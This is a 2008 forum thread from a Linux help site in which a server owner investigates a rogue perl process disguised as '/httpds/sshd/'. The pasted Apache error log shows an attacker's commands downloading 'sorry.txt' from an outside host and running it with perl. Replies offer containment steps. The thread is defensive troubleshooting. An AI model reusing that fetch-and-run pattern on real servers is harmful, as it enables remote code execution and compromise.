LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Server (https://www.linuxquestions.org/questions/linux-server-73/)
-   -   Perl eating CPU Time - what is "/httpds/sshd/" (https://www.linuxquestions.org/questions/linux-server-73/perl-eating-cpu-time-what-is-httpds-sshd-612370/)

neo_fox 01-09-2008 11:24 AM

Perl eating CPU Time - what is "/httpds/sshd/"
 
Hi All,

Since few weeks my server slooooow down sometimes and when I log me in via SSH I can see that the perl process eating CPU time. The only one solution is too kill those processes one after another (because it resurrect ;) )

I see that this process has been started by Apache so I'm afraid that it could be hack attempt.

Code:

# top
13599 apache    25  0  5088 2868 1200 R 97.1  0.3  27:36.12 perl

Code:

#ps aux | grep 13599
apache  13599 52.0  0.2  5088  2868 ?        R    14:27  27:44 /httpds/sshd/

Could someone tell me what "/httpds/sshd/" is?

I use ssh and sftp instantly.
I have already disabled the apache perl module.
The OS is: Fedora Core 5 2.6.20-1.2320.fc5
Apache: 2.2.2
PHP: 5.1.6

Any help is very appreciated :-)

Best Regards,
Neo

trickykid 01-09-2008 11:29 AM

perl doesn't run like that unless a user most likely runs a script, etc. Sounds to me like you possibly got hacked. I'd say you may want to unplug this machine from the network to do a full investigation. Unless you have something with apache that kicks off a perl script/program, etc.

neo_fox 01-09-2008 01:54 PM

The problem is I cannot unplug this machine because this is leased root server :confused:

I saw that webmin starts also some perl processes but they not causing this problem I think.

How can I found who starts this processes and what is "/httpds/sshd/"

I'm trying to be very carefully with this server. No root access, complicated password, I check regularly the logfiles but I didn't saw something suspect :(

trickykid 01-09-2008 05:11 PM

Leased root server? I'd suggest asking the people you lease it from then. But seriously, if there are processes you don't know about or how they start and you are in full control of this server, better start asking questions to your provider.

httpds/sshd sounds to me like some type of web enabled ssh program I would guess. That's why I'd suggest asking the lease provider. Most likely this server of yours could just be a virtual server and they might have programs running to monitor, applications you may not want running, etc.

neo_fox 01-09-2008 11:24 PM

I cannot ask my provider because this is a root server. So this mean I have a physical server in theirs server room. But this is my server, it's not virtual. So this mean that they does not installed any programs there and only support is for hardware or networks connection.

Regards,
Neo

neo_fox 01-10-2008 01:45 AM

It seems to be hack attempt. I saw this in my general apache error logfile:

Code:


  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current
                                Dload  Upload  Total  Spent    Left  Speed
100 13685  100 13685    0    0  2267      0  0:00:06  0:00:06 --:--:-- 35000
sh: line 1: 13589 Killed                  perl sorry.txt
--14:27:07--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

    0K .......... ...                                        100% 37.4K=0.4s

14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]

sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
--15:20:31--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

    0K .......... ...                                        100% 34.6K=0.4s

15:20:33 (34.6 KB/s) - `sorry.txt' saved [13685/13685]

  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current
                                Dload  Upload  Total  Spent    Left  Speed
100 13685  100 13685    0    0  16702      0 --:--:-- --:--:-- --:--:-- 32962
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
Can't open perl script "sorry.txt": No such file or directory
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [error] [client 208.186.169.183] File does not exist: /var/www/sigsiu/html/ebay/zenphoto
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.

I think that it does not work. But how it is possible if apache perl module is disabled?

Promethyl 02-02-2008 08:29 AM

Well, I would start by renaming perl to perl2 and killing the processes. (Temporary.)

Then, put in hosts entries for the IRC servers it uses, so it can't communicate out.

It has a list of ports it scans, I would also AFP block any of those which aren't in use legitimately.

A lot of it is in Spanish, so it's unclear.

Now, I would look for how it got there in the first place. Uploaded by user? That part I've shaky on.


All times are GMT -5. The time now is 04:19 PM.